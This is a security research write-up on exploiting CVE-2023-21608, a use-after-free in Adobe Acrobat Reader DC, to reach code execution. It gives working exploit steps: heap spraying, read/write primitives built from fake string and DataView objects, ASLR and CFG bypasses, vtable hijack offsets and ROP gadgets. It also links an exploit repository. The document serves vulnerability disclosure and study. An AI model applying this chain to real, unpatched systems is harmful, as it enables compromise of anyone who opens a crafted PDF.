Ashfaq Ansari, Krishnakant Patil
Overview
In the third part of the PDF Reader series, we are going to see how we exploited a use-after-free vulnerability in Adobe Acrobat Reader DC. The bug was found during our fuzzing campaign targeting popular PDF readers. We were able to successfully exploit this vulnerability to gain Remote Code Execution in the context of Adobe Acrobat Reader.
We have already shared 2 parts of the series, where we exploited Adobe Reader for Information Leaks and Foxit PDF Reader for Remote Code Execution (RCE). Both parts are linked below so that you can read more about them.
- Adobe Reader - XFA - ANSI-Unicode Confusion - Information Leak - CVE-2021-45067
- Foxit PDF Reader - Use after Free - Remote Code Execution Exploit - CVE-2022-28672
Zero Day Initiative (ZDI) acquired both the vulnerability and the exploit.
Advisory
CVE-2023-21608
Testbed
- OS edition: Windows 10 Pro 20H2 19042.804
- Product: Adobe Acrobat Reader DC 2022.003.20258
- Product URL: https://get.adobe.com/reader/otherversions/
Proof of Concept
The test case contains a static text field named testField embedded inside a PDF document.
5 0 obj
<<
/Type /Annot
/Subtype /Widget
/T (testField)
/FT /Tx
/Rect [0 0 0 0]
>>
The relevant JavaScript that triggers the bug is given below.
Crash State
Enable page-heap for AcroRd32.exe and open the crash.pdf file with Adobe Acrobat Reader DC.
eax=04f6a0f0 ebx=00000000 ecx=420fefd0 edx=44e1cff8 esi=6921ef50 edi=420fefd0
eip=6c556b99 esp=04f6a0d0 ebp=04f6a0fc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
AcroForm!CAgg::operator[](unsigned short)+0xe:
6c556b99 8b07 mov eax,dword ptr [edi] ds:002b:420fefd0=????????
Note: All analysis and exploitation outlined in this post is done on Adobe Acrobat Reader DC version 2022.001.20085 x86.
Stack Trace
A quick verification using the !heap command reveals that this is a use-after-free vulnerability.
At this stage, with the above initial analysis in hand, we decided to deep dive into analyzing the root cause of this bug and see if we could exploit it to achieve RCE in Adobe Reader's sandbox process.
Root Cause Analysis
A couple of things to note in this PoC:
- The bug occurs during the second call to resetForm
- resetForm invokes calculate events on all fields if a Calculate handler is defined
- In the Calculate handler, the event object's target property is overridden with a user-defined function getterFunc
- Inside this getterFunc function, the textFont property of the field is redefined with the value of the doc object
- This causes a crash when the event.richValue = this assignment is executed in the Calculate handler
The crash can be traced back through the call stack to the responsible call hierarchy.
The bug occurs when some form of value aggregation starts inside SetRichValueEventProp, which enumerates the assigned object this, which is an instance of the current doc object.
The properties and methods of doc are enumerated recursively using EScript!ESObjectEnum, which accepts a callback where enumerated property details are passed from EScript to AcroForm. The AcroForm!EScript_ESObjectEnum_CallbackProc callback is triggered for every property being enumerated.
When page-heap is enabled, the crash occurs in _DWORD *__thiscall std::map<unsigned short,CAgg>::lower_bound(TREE_VAL *this, _DWORD *a2, unsigned __int16 *a3) when dereferencing this pointer, which is a std::map object in the current context.
_DWORD *__thiscall std::map<unsigned short,CAgg>::lower_bound(TREE_VAL *this, _DWORD *a2, unsigned __int16 *a3)
{
TREE_NODE *Myhead; // eax
TREE_NODE *Parent; // ecx
unsigned __int16 v5; // si
int v6; // eax
Myhead = this->_Myhead; // crash location - page-heaps enabled
Parent = this->_Myhead->_Parent;
...
}
After checking the caller of this function, it appears that the int __thiscall std::map<unsigned short,CAgg>::operator[](TREE_VAL *this, int a2, unsigned __int16 *pSomeID) function is responsible for inserting a value into the corresponding std::map.
The code above shows that a new CAgg allocation is created while inserting a value into the std::map. Testing with heap grooming and the .dvalloc trick revealed that the std::map<unsigned short,CAgg>::insert function also allows for arbitrary writes on the chosen address. By using heap grooming, it is possible to gain control of the corrupted std::map pointer used in this context, allowing for further exploitation.
By exploiting the arbitrary write, it is possible to corrupt the length of the ArrayBuffer and gain relative out-of-bounds read-write capabilities. This allows for relative data to be read from or written to memory locations outside of the bounds of the ArrayBuffer.
Further investigation into how the map was corrupted revealed that the AcroForm!CAgg::operator[](unsigned short) function was calling std::map<unsigned short,CAgg>::operator[] with this->map. When examining the CAgg object in the debugger, it was discovered that it had been freed and was now user-controlled. This opened up the possibility for further exploitation of the vulnerability.
While there were no obvious primitives available on the corrupted CAgg object, it was possible to read its type with this->type. The CAgg::operator[] function was called from EScript_ESObjectEnum_CallbackProc, which is triggered for each property being enumerated by EScript!ESEnumObject. This provided some insight into how the object was corrupted and could potentially be exploited.
In this current scenario, we have a problem with the pCagg object. This object has already been freed, but it is still being used in the callback function EScript_ESObjectEnum_CallbackProc where it's passed to the ESValToCAgg function.
Note: This function is recursive, so the problem repeats over and over.
Our analysis shows that the CAgg objects are allocated inside the std::map<unsigned short,CAgg>::operator[] function during each property enumeration when setting the richValue property. However, during the resetForm process, the event.target property is trapped using __defineGetter__. This function is called during the recursive properties enumeration of the doc object. When the target property is accessed, the getterFunc function is called, which redefines the field's textFont property as the doc object. This also sets it to be non-configurable and non-enumerable.
During the second resetForm, the same process is repeated, but when getterFunc is called again, it raises an exception because the field.textFont property is now non-configurable. This causes a different path to be taken when accessing the event.richValue property, which frees all of the CAgg objects that have been constructed so far. The free code path is called while the object enumeration is still in progress, and when it finishes, the enumeration goes on to use the freed CAgg object.
The above hypothesis can be verified in a debugger by setting the following breakpoints in WinDbg.
The trace output result from the above breakpoints is provided below.
Inside the debugger, we can see the corrupted std::map object pData: d41d0fd0, which is part of the freed CAgg object that was allocated during the enumeration of the textFont property alloc: d41d0fb8.
When the free code path is taken, all objects and map objects are freed. The same pointer is later accessed when processing the richValue property enumeration, leading to a use-after-free condition.
Note: During the testing to control the use-after-free condition, we did not find any code paths that would allow us to reallocate the freed memory in a way that could be exploited.
However, we discovered that certain object sizes can cause Adobe Acrobat Reader to crash while dereferencing the sprayed pattern, giving us the possibility to exploit the bug for Remote Code Execution (RCE).
Heap Grooming
By grooming heap allocations with an object of size 68, we were able to control the crash. The crashing object size was initially found by brute forcing.
Note: The grooming was done before the UaF was triggered. We will come back to this later.
eax=04b7a854 ebx=04b7a8b4 ecx=42424141 edx=4e4e4d4d esi=6921ef50 edi=42424141
eip=6c3695af esp=04b7a838 ebp=04b7a838 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212
AcroForm!CAgg::operator[](unsigned short)+0x3:
6c3695af 8b01 mov eax,dword ptr [ecx] ds:002b:42424141=????????
In the crashing function, we can see that the user-controlled value is being dereferenced.
The allocation source can be verified in WinDbg as shown below.
Looking further into why heap grooming before the bug trigger produced a controlled crash, we observed that the array of sprayed string objects is also used during aggregation while resetForm is in progress.
Inside CAggToESVal when the object type is a string, the below code is triggered which creates a new string from CAgg.
One important detail to note here is the call to EScript!ESValSetString to create new string content from the CAgg string object (which are our sprayed string objects). ESValSetString calls sub_1003EBD2 to create a string with the given content, which is further responsible for allocating a heap buffer of the string length and copying the source string content into it.
In the above code, JS_malloc_Wrapper will reallocate the freed CAgg buffer when processing a large number of strings, allowing us to reallocate the buffer with user-controlled data. When this sprayed buffer is later used in the CAgg::* functions, it causes a crash while dereferencing user-controlled data.
SpiderMonkey Internals in EScript.API
Firefox's SpiderMonkey is the JavaScript engine used inside Adobe Reader through the EScript.api plugin for processing JavaScript embedded inside PDFs. To effectively exploit this bug, we need to understand how JavaScript objects are implemented inside SpiderMonkey and how they are organized in memory.
SpiderMonkey uses a 64-bit representation to store a native JavaScript jsval in memory.
- Doubles are stored as full 64-bit IEEE-754 values
- Other jsval types, such as integer numbers, strings, and objects, use 32 bits for type tagging and 32 bits for storing the actual value (or object pointer)
ArrayBuffer
We will use ArrayBuffer for spraying user-controlled data at predictable addresses and corrupting the length with an arbitrarily large integer value to gain out-of-bounds read-write primitives. Let's look at how it is represented in memory.
The ArrayBuffer implementation has a 0x10-byte header followed by content equal to the size specified.
- Length is stored at an offset of 0x4
- If a TypedArray is initialized, the TypedArray pointer is found at an offset of 0x8
- Finally, you have the actual user-controlled data
In the EScript.api, the sub_10131A2C function is responsible for allocating an ArrayBuffer of the specified length. If the size of the ArrayBuffer is less than 0x68, an inline representation is used to store the data. Otherwise, a block of memory of the specified size is created and filled with zeros.
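The header layout described above can be modelled with a DataView standing in for raw memory. This is a minimal sketch meant for a standalone engine such as Node.js, not for Acrobat itself. The helper parseArrayBufferHeader and the sample values are hypothetical; only the offsets (0x4 for the length, 0x8 for the TypedArray pointer, 0x10 for the data) and the 0x68 inline threshold come from the description above.

```javascript
// Offsets taken from the layout described in this post.
var HEADER_SIZE = 0x10;      // bytes of header before the user data
var LENGTH_OFFSET = 0x4;     // byte offset of the length field
var VIEW_PTR_OFFSET = 0x8;   // byte offset of the TypedArray pointer
var INLINE_LIMIT = 0x68;     // sizes below this are stored inline

// Hypothetical helper: interpret simulated memory at byte offset `base`
// as an ArrayBuffer header.
function parseArrayBufferHeader(mem, base) {
    var length = mem.getUint32(base + LENGTH_OFFSET, true);
    return {
        length: length,
        typedArrayPtr: mem.getUint32(base + VIEW_PTR_OFFSET, true),
        dataStart: base + HEADER_SIZE,
        inline: length < INLINE_LIMIT
    };
}

// Simulated memory holding one header for a 0x100-byte buffer.
var mem = new DataView(new ArrayBuffer(0x200));
mem.setUint32(0x40 + LENGTH_OFFSET, 0x100, true);
var before = parseArrayBufferHeader(mem, 0x40);

// Overwriting the length field with a pointer-sized value (made up here)
// makes the buffer appear far larger than its real allocation.
mem.setUint32(0x40 + LENGTH_OFFSET, 0x0db3c420, true);
var after = parseArrayBufferHeader(mem, 0x40);
```

Once the length field holds a large value, every index between the real size and the fake length becomes a relative out-of-bounds access from the engine's point of view.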
Array
var a = new Array();
a[0] = 0x41424142;
a[1] = 0x55555555;
a[2] = "javascript";
a[3] = {};
We will use Array to achieve the addrOf (address of) primitive. The representation of the JavaScript array in memory is given below.
sub_1004DBA9 in EScript.api is responsible for creating arrays and can be tracked while spraying arrays.
The contents of the array are organized in (tag, value) tuple in memory, where the tag is used to identify the type associated with the value.
e.g.
Number - ffffff81
String - ffffff85
Object - ffffff87
When we have out-of-bounds access on the ArrayBuffer, we can spray a large JavaScript array just after the ArrayBuffer and use the out-of-bounds primitive to read the address of any arbitrary JavaScript object.
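To make the (tag, value) layout concrete, here is a small sketch that classifies one 8-byte slot. It is meant for a standalone engine such as Node.js. The helper decodeJsval is hypothetical; the three tags are the ones listed above, and treating every other upper dword as the high half of a double is a simplifying assumption rather than the engine's actual rule.

```javascript
// Tags as listed in this post.
var TAG_NUMBER = 0xffffff81;
var TAG_STRING = 0xffffff85;
var TAG_OBJECT = 0xffffff87;

// Hypothetical helper: classify one slot given its low dword (value)
// and high dword (tag), in the order they appear in memory.
function decodeJsval(lowDword, highDword) {
    switch (highDword >>> 0) {
    case TAG_NUMBER:
        return { type: "number", payload: lowDword >>> 0 };
    case TAG_STRING:
        return { type: "string", payload: lowDword >>> 0 };
    case TAG_OBJECT:
        return { type: "object", payload: lowDword >>> 0 };
    default:
        // Assumption: anything else is the raw bit pattern of a double.
        var dv = new DataView(new ArrayBuffer(8));
        dv.setUint32(0, lowDword >>> 0, true);
        dv.setUint32(4, highDword >>> 0, true);
        return { type: "double", payload: dv.getFloat64(0, true) };
    }
}

var asString = decodeJsval(0x0db3c420, 0xffffff85);  // sample pointer value
var asDouble = decodeJsval(0x00000000, 0x3ff00000);  // bit pattern of 1.0
```

For string and object slots the payload is a pointer, which is why reading such a slot out of bounds is enough to leak an object's address.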
We can see the way our string is represented in memory by dumping the memory of the above pointer.
Later in the exploitation, we create fake strings with the help of ArrayBuffer and use one of the sprayed fake strings to read arbitrary memory contents, achieving a temporary arbitrary read primitive.
Exploitation
We used .dvalloc to check whether we had any controlled read-write crashes or a crash while calling an arbitrary virtual function pointer.
We found a crash that leads to an arbitrary write on our controlled address:
(*ecx) = some_32_value, where ecx is a user-controlled pointer.
Strategy
- Spray a lot of ArrayBuffer to get an allocation at a predictable address like 0x20000048
- Groom LFH with our specified pattern to corrupt the ArrayBuffer at a predictable address
- Trigger the vulnerability to use the freed buffer and corrupt the ArrayBuffer length
- Use the corrupted ArrayBuffer to create a fake string to achieve an arbitrary read primitive
- Use arbitrary read from the fake string to create a fake DataView to achieve arbitrary read-write primitives
- Corrupt the field's virtual table to hijack execution control
- Bypass CFG
- Execute shellcode
- Restore corrupted objects and recover cleanly
Spraying ArrayBuffer
var SPRAY = [];
for(var i=0; i<0x2000; i++) {
SPRAY[i] = new ArrayBuffer(0x10000-24);
const typedArray = new Uint32Array(SPRAY[i]);
typedArray[0] = 0x41424344;
typedArray[1] = 0x41424344;
}
Using the above script, we can have an ArrayBuffer allocated at a predictable address such as 0x20000058.
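The odd-looking size 0x10000-24 makes sense once allocator overhead is added back. As a rough check, assuming the 0x10-byte ArrayBuffer header described earlier plus an 8-byte heap chunk header on 32-bit Windows (the latter is an assumption, not something measured in this post), each sprayed buffer would occupy exactly 0x10000 bytes. The helper dataAddress is hypothetical.

```javascript
var REQUESTED = 0x10000 - 24;   // size passed to new ArrayBuffer() in the spray
var AB_HEADER = 0x10;           // ArrayBuffer header size from this post
var HEAP_HEADER = 8;            // assumed 32-bit heap chunk header size

// Total footprint of one sprayed buffer under the assumptions above.
var stride = REQUESTED + AB_HEADER + HEAP_HEADER;

// Hypothetical helper: where the user data starts for a buffer whose
// ArrayBuffer header sits at `headerAddr`.
function dataAddress(headerAddr) {
    return headerAddr + AB_HEADER;
}

var dataStart = dataAddress(0x20000048);
```

Under this arithmetic, a header at 0x20000048 would put the user data at 0x20000058, which would be consistent with both addresses appearing in this post.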
Locating ArrayBuffer
By using magic markers, we can locate the buffer in heap memory which helps to find the constructor which allocates the ArrayBuffer in Adobe Reader.
Note: Allocation of ArrayBuffer happens in EScript.api code.
For example, when allocating an ArrayBuffer of size 0x1020, searching memory for the magic marker and identifying who allocated the memory can help us find the ArrayBuffer constructor.
Verifying the ArrayBuffer backing memory (array buffer chunk + header size (0x10)).
By using a WinDbg breakpoint on the constructor code, we can find the addresses where ArrayBuffer is being allocated.
bp Escript+0x131a4e ".printf \"[ArrayBuffer alloc] %p \\n\", eax; gc"
Now, let's see what the actual ArrayBuffer spray looks like in the exploit.
ArrayBuffer allocation on predictable address 0x20000048 is successful
By using heap grooming with our predictable address pattern and triggering the vulnerability, we can see that the ArrayBuffer length is corrupted/modified.
The length of the ArrayBuffer is corrupted by a pointer value, allowing for relative out-of-bounds read-write on the heap.
Once the vulnerability is triggered, the corrupted ArrayBuffer can be located using the code below.
for (var i=0; i<bufs.length; i++)
{
if (bufs[i].byteLength != ALLOC_SIZE)
{
console.println("[+] corrupted array buffer found at " + i + " : length: " + bufs[i].byteLength + " : buf length: " + bufs.length);
...
}
}
Out-of-bounds to Arbitrary Read-Write Primitives
Once out-of-bounds read-write primitives are achieved on the ArrayBuffer, a JavaScript Array is used to create the addrOf primitive. To be able to read and write Array contents, a set of Arrays of a length similar to the ArrayBuffer is sprayed so that the Array allocations land just after the ArrayBuffer spray, as shown below.
-------------------------------------------------------------------------------
| | | | | | | | | | |
|arrbuf_1|arrbuf_2|arrbuf_3|.........|arrbuf_n|...|array_1|array_2|...|array_n|
| | | | | | | | | | |
-------------------------------------------------------------------------------
With ArrayBuffer out-of-bounds access, we can find the start of the first Array and use it to further create another set of primitives:
- addrOf - leak address of any JavaScript object
- poi - leak value at a given address (this initial form of AAR is required to create full AAR/AAW)
- AAR - read the arbitrary value at a given address
- AAW - write value at a given address
Spraying large Array
- We need to allocate a few large Array just after our sprayed ArrayBuffer
- Once we corrupt the length of the ArrayBuffer, we can locate this Array and corrupt the adjacent Array for arbitrary read-write primitives
- However, the JavaScript Array reallocations seem to grow in a certain pattern when we add a large number of elements to the Array in a loop
for(var k = 0; k<N; k++) {
_arr_.push(0x41414141);
}
- After some testing, we observed that the reallocation length can be partially controlled by allocating the Array with initial contents
// initial contents are adjusted after testing a few iterations
// to be large enough to be allocated just after the sprayed ArrayBuffer
var _arr_ = new Array(1, 2, 3, 4);
Controlled Array Spraying
- Array with initializer should start with the allocation of 0x003f0
- Further, elements initialization inside the for loop should increase the allocation sizes using reallocs
- Increment of Array length happens as: 0x003f0 -> 0x007d0 -> 0x00f90 -> 0x01f10 -> 0x03e10 -> 0x07c10 -> 0x0f810
- Re-allocations with size 0x0f810 should land the Array allocations just after the last ArrayBuffer from our spray
- When we read out-of-bounds from a corrupted ArrayBuffer, we should be able to read the contents of the sprayed Array
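The observed size sequence is consistent with a simple model: a 0x10-byte header followed by 8-byte element slots, with the element capacity doubling on each reallocation. The sketch below reproduces the listed sizes under that assumption. The helper growthSizes is hypothetical, and the starting capacity of 124 elements is inferred from 0x003f0 rather than taken from the engine.

```javascript
var ARRAY_HEADER = 0x10;   // assumed header size in bytes
var SLOT_SIZE = 8;         // one (value, tag) pair per element

// Hypothetical helper: allocation sizes for the initial capacity and
// for each of `steps` subsequent doublings.
function growthSizes(initialCapacity, steps) {
    var sizes = [];
    var capacity = initialCapacity;
    for (var i = 0; i <= steps; i++) {
        sizes.push(ARRAY_HEADER + SLOT_SIZE * capacity);
        capacity *= 2;
    }
    return sizes;
}

// Format each size as a 5-digit hex value, as in the list above.
var sizes = growthSizes(124, 6).map(function (n) {
    return "0x" + ("00000" + n.toString(16)).slice(-5);
});
var sequence = sizes.join(" -> ");
```

Put differently, each size in the observed sequence equals twice the previous one minus 0x10, which is what a fixed header plus a doubling payload would produce.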
The final Array allocation should look as given below.
Where 0db3c420 ffffff85 is targetStr and 0dda27c0 ffffff87 is targetDataView.
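Each element in such a dump occupies two dwords, value first and tag second. The indices used for the primitives in this post (arrStart+4, arrStart+6 and arrStart+8 for elements 0, 1 and 2) fit a layout with four header dwords before the first element. The sketch below encodes that arithmetic over a simulated view; valueIndex, readElement and the placement of the Array at dword 0x20 are hypothetical.

```javascript
var HEADER_DWORDS = 4;   // inferred from the arrStart+4 index used for element 0

// Index of the value dword for element `i`, relative to the typed view.
function valueIndex(arrStart, i) {
    return arrStart + HEADER_DWORDS + 2 * i;
}

// Hypothetical helper: read element `i` as a {value, tag} pair.
function readElement(view, arrStart, i) {
    var idx = valueIndex(arrStart, i);
    return { value: view[idx], tag: view[idx + 1] };
}

// Simulated out-of-bounds view with an Array placed at dword index 0x20.
var view = new Uint32Array(0x40);
var arrStart = 0x20;
view[valueIndex(arrStart, 1)] = 0x0db3c420;      // targetStr pointer from the dump
view[valueIndex(arrStart, 1) + 1] = 0xffffff85;  // string tag
view[valueIndex(arrStart, 2)] = 0x0dda27c0;      // targetDataView pointer
view[valueIndex(arrStart, 2) + 1] = 0xffffff87;  // object tag

var strSlot = readElement(view, arrStart, 1);
var dvSlot = readElement(view, arrStart, 2);
```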
addrOf Primitive
The addrOf primitive allows us to leak the address of any JavaScript object by reading the address of the object stored in a sprayed Array using out-of-bounds primitives. The corruptedTypedArr is a typed array with a corrupted ArrayBuffer length, and arrStart is the index where the JavaScript Array is located from the start of the corrupted ArrayBuffer. The modified_arr is the JavaScript Array from the sprayed Arrays that we will use for corruption and address leakage.
function addrOf(obj)
{
modified_arr[0] = obj;
var addr = corruptedTypedArr[arrStart+4];
return addr;
}
Temporary Arbitrary Read Primitive
The poi primitive allows us to read the value at an arbitrary address.
To achieve the poi primitive, we need to perform a few steps:
- Allocate a string in global scope like var targetStr = "Hello";
- Spray the above string object as an element in the sprayed arrays: arrs[i][1] = targetStr;
- Spray a fake string structure inside the sprayed ArrayBuffer
uintArr[FAKE_STR_START] = 0x102; // type
uintArr[FAKE_STR_START+1] = arrBufPtr+0x40; // buffer
- Once out-of-bounds primitives are achieved, we overwrite the pointer to the sprayed string object in the array with the address of the fake string: uintArr[arrStart+6] = FAKE_STR;
- Now, targetStr, which was sprayed along with the Array, can be confused with the fake string.
- Reading a value from an arbitrary address is achieved by setting the backing buffer pointer of the fake string to addr and then reading the targetStr element of our modified Array as usual.
function s2h(s) {
var n1 = s.charCodeAt(0)
var n2 = s.charCodeAt(1)
return ((n2<<16) | n1) >>> 0
}
function poi(addr)
{
// leak values at addr by setting it to string pointer
corruptedTypedArr[FAKE_STR_START+1] = addr;
var val = s2h(modified_arr[1]);
return val;
}
Arbitrary Read-Write Primitives
Once we achieve out-of-bounds read-write on the ArrayBuffer, we can use the addrOf and poi primitives to perform arbitrary reads. With these primitives, we can derive full arbitrary read-write primitives by using the JavaScript DataView object.
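Because poi reads memory through a string, every read comes back as UTF-16 code units, and s2h packs the first two into a little-endian dword. The round trip can be checked outside Acrobat, for example in Node.js; h2s is a hypothetical inverse added only for this illustration.

```javascript
// Same conversion as in the post: two UTF-16 code units -> one dword.
function s2h(s) {
    var n1 = s.charCodeAt(0);
    var n2 = s.charCodeAt(1);
    return ((n2 << 16) | n1) >>> 0;
}

// Hypothetical inverse: one dword -> two UTF-16 code units.
function h2s(value) {
    return String.fromCharCode(value & 0xffff, (value >>> 16) & 0xffff);
}

var sample = h2s(0x41424344);   // low half first, then high half
var decoded = s2h(sample);
```

The trailing >>> 0 matters: without it, any dword with the top bit set would come back as a negative number.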
To create arbitrary read-write primitives using a DataView object, we can follow these steps:
- Create a DataView object with a valid ArrayBuffer and set an initial value for it:
var targetDV = new DataView(new ArrayBuffer(0x64));
targetDV.setUint32(0, 0x55555555, true);
- Spray the targetDV object as an element in each Array of the sprayed Arrays:
for (var i=0; i<0x10; i++)
{
...
arrs[i][2] = targetDV;
...
}
- Create a fake DataView object by spraying an ArrayBuffer and setting a magic number value at the start of the spray.
uintArr[FAKE_DV_START] = 0x77777777;
- Once out-of-bounds primitives are achieved, assign the fake DataView object to the address of the sprayed DataView object.
uintArr[arrStart + 8] = FAKE_DV;
- Clone the contents of the valid DataView object into the fake DataView using the previously constructed primitives.
var targetDVPtr = addrOf(targetDV);
for (var k=0; k<32; k++)
{
corruptedTypedArr[FAKE_DV_START + k] = poi(targetDVPtr + (k * 4));
}
- Finally, to perform arbitrary read-write, set up the fake DataView object's backing ArrayBuffer pointer and read/write from the DataView object.
function AAR(addr)
{
corruptedTypedArr[FAKE_DV_START + 20] = addr;
return modified_arr[2].getUint32(0, true);
}
function AAW(addr, value)
{
corruptedTypedArr[FAKE_DV_START + 20] = addr;
modified_arr[2].setUint32(0, value, true);
}
Shellcode Execution
To execute shellcode, we use the arbitrary read-write (AAR/AAW) primitives to bypass ASLR and CFG.
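The AAR and AAW primitives both work by retargeting one pointer-sized field and then going through an otherwise ordinary accessor. The following sketch models that idea over a simulated flat memory so it can run in Node.js. Everything here is a stand-in: the memory buffer, the FAKE_DV_ADDR location, and the helper setDataPointer are hypothetical, while the use of dword 20 of the fake object as its data pointer is taken from the AAR/AAW code in this post.

```javascript
var memory = new DataView(new ArrayBuffer(0x1000));  // simulated address space
var FAKE_DV_ADDR = 0x100;   // hypothetical location of the fake DataView
var DATA_PTR_DWORD = 20;    // dword index of the backing-store pointer

// Point the fake DataView's backing store at `addr`.
function setDataPointer(addr) {
    memory.setUint32(FAKE_DV_ADDR + DATA_PTR_DWORD * 4, addr, true);
}

// Models getUint32(0, true) on the fake object.
function AAR(addr) {
    setDataPointer(addr);
    var target = memory.getUint32(FAKE_DV_ADDR + DATA_PTR_DWORD * 4, true);
    return memory.getUint32(target, true);
}

// Models setUint32(0, value, true) on the fake object.
function AAW(addr, value) {
    setDataPointer(addr);
    var target = memory.getUint32(FAKE_DV_ADDR + DATA_PTR_DWORD * 4, true);
    memory.setUint32(target, value >>> 0, true);
}

AAW(0x400, 0xdeadbeef);
var readBack = AAR(0x400);
```

Nested calls such as AAR(AAR(p + 0x10) + 0x34) are then just pointer chasing: each inner read yields the base for the next one.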
The steps are as follows:
- Bypass ASLR by leaking the AcroForm.api base address from the field object
var AcroFormApiBase = AAR(AAR(addrOf(testField) + 0x10) + 0x34) - 0x00293fe0
- Leak the address of the field vtable
var fieldVtblAddr = AAR(AAR(AAR(AAR(addrOf(testField) + 0x10) + 0x10) + 0xc) + 4)
var fieldVtbl = AAR(fieldVtblAddr)
- Clone the vtable into the heap (cloning is necessary as we do not have the write permission on the vtable address). We clone it to our chosen heap address (picked from the ArrayBuffer spray) and make further modifications there.
for(var i=0; i < 32; i++) {
AAW(arrBufPtr + 0x100 + (i * 4), AAR(fieldVtbl + i * 4));
}
- Perform stack pivoting into our controlled heap for shellcode execution. We prepare a fake stack on the heap with the necessary details as shown below:
AAW(arrBufPtr+0x100+0x48, AcroFormApiBase+0x6faa60); // CFG gadget = AcroForm!sub_20EFAA60;
AAW(arrBufPtr+0x100+0x30, AcroFormApiBase+0x256984); // 0x6b5e6984: mov esp, eax; dec ecx; ret;
AAW(arrBufPtr+0x100, AcroFormApiBase+0x1e646); // 0x6b3ae646: pop esp; ret;
AAW(arrBufPtr+0x100+4, arrBufPtr+0x300); // our pivoted stack
AAW(fieldVtblAddr, arrBufPtr+0x100); // field vtable
- Set up ROP and execute the shellcode
- Finally, invoke the shellcode by accessing the defaultValue property on the testField object.
var ret = testField.defaultValue;
Control Flow Guard (CFG) Bypass
Adobe Acrobat Reader has CFG enabled by default, so it is not possible to call the shellcode directly. Previous versions of exploits relied on using non-CFG modules within Adobe Reader to create the ROP chain, but newer versions have all modules CFG enabled.
One way to bypass this is to use the call sites that are not CFG instrumented. We found multiple non-CFG instrumented call sites that could be used to bypass CFG in Adobe Acrobat Reader. One of these functions is sub_20EFAA60, which allows us to call an address that we control by storing it in the ecx register.
This can be used to control the program's execution and execute the shellcode.
Context Restoration and Recovery
After running the shellcode, Acrobat Reader crashes because the relevant context has not been restored. To keep Adobe Acrobat Reader running after exploitation, it is important to restore this context.
This involves several steps:
- Restoring targetStr and targetDV using the fake string and DataView that were created earlier
- Restoring the original vtable that was hijacked for code execution
- Fixing any corruption caused by the ArrayBuffer corruption and other side effects of this corruption
- Restoring the stack (this is done in the shellcode recovery part)
- Restoring ESP to its default value (this is also done in the shellcode recovery part)
- Backing up original values before corruption so they can be restored once the shellcode is executed (this is shown in the below snippet)
The below snippet shows how some of the original values are backed up before corruption so they can be restored once the shellcode has been executed.
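As a generic illustration of the backup-and-restore pattern, one option is to record (address, value) pairs before each overwrite and replay them in reverse afterwards. This is only a sketch over simulated memory that can run in Node.js, not the snippet from the original exploit; read32, write32, backupAndWrite and restoreAll are hypothetical names, and the addresses and values are made up.

```javascript
var memory = new DataView(new ArrayBuffer(0x100));  // simulated memory
function read32(addr) { return memory.getUint32(addr, true); }
function write32(addr, value) { memory.setUint32(addr, value >>> 0, true); }

var saved = [];

// Record the original dword, then overwrite it.
function backupAndWrite(addr, value) {
    saved.push({ addr: addr, value: read32(addr) });
    write32(addr, value);
}

// Undo all recorded writes, newest first.
function restoreAll() {
    while (saved.length > 0) {
        var entry = saved.pop();
        write32(entry.addr, entry.value);
    }
}

write32(0x10, 0x11111111);           // pretend this is an original pointer
backupAndWrite(0x10, 0x41414141);    // corrupt it for the exploit
var corrupted = read32(0x10);
restoreAll();                        // put the original value back
var restored = read32(0x10);
```

Restoring in reverse order keeps the result correct even if the same address was overwritten more than once.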
Exploit Log
64-bit Exploitation
The CVE-2023-21608 bug also affected the 64-bit version of the Adobe Reader. We evaluated the possibility of exploiting this bug on the 64-bit version.
However, we stumbled upon 2 major issues:
- Heap spraying is no longer possible in the 64-bit address space. Hence, we could no longer rely on the ArrayBuffer spraying technique outlined above to allocate controlled data at predictable addresses. We would now need a separate info-leak bug for further exploitation.
- Finding an info-leak is not the difficult part, though. The core problem that makes this bug useless for 64-bit exploitation is that the sprayed strings are used as aggregation objects, where new strings are created from the sprayed string. While creating a new string, the standard C null terminators are honored, so we can't use any address that has two consecutive NULL bytes in it. Such an address stops the string copy, and we would never be able to re-allocate the freed memory with a controlled chunk that has the leaked ArrayBuffer address in it. The bug would no longer be effective and reproducible, which rules out exploiting it on the 64-bit version.
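The terminator problem can be illustrated by splitting an address into the 16-bit units a wide-string copy would see. The sketch below assumes the copy stops at the first zero 16-bit unit (aligned, not any two adjacent zero bytes) and that addresses are laid out little-endian; toUnits, hasNullUnit and the 64-bit sample address are hypothetical. Typical user-mode 64-bit Windows pointers have zero upper 16 bits, so under this assumption they always contain such a unit.

```javascript
// Split a pointer, given as little-endian dwords, into 16-bit units.
function toUnits(dwords) {
    var units = [];
    for (var i = 0; i < dwords.length; i++) {
        units.push(dwords[i] & 0xffff, (dwords[i] >>> 16) & 0xffff);
    }
    return units;
}

// Hypothetical check: would a wide-string copy stop inside this pointer?
function hasNullUnit(dwords) {
    return toUnits(dwords).indexOf(0) !== -1;
}

var addr32 = [0x20000058];               // 32-bit spray address from this post
var addr64 = [0x12345678, 0x00007ff6];   // made-up 64-bit user-mode address

var stops32 = hasNullUnit(addr32);
var stops64 = hasNullUnit(addr64);
```

The 32-bit spray address splits into 0x0058 and 0x2000, neither of which is zero, whereas the top unit of the 64-bit address is 0x0000 and would cut the copy short.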
Exploit Repository
https://github.com/hacksysteam/CVE-2023-21608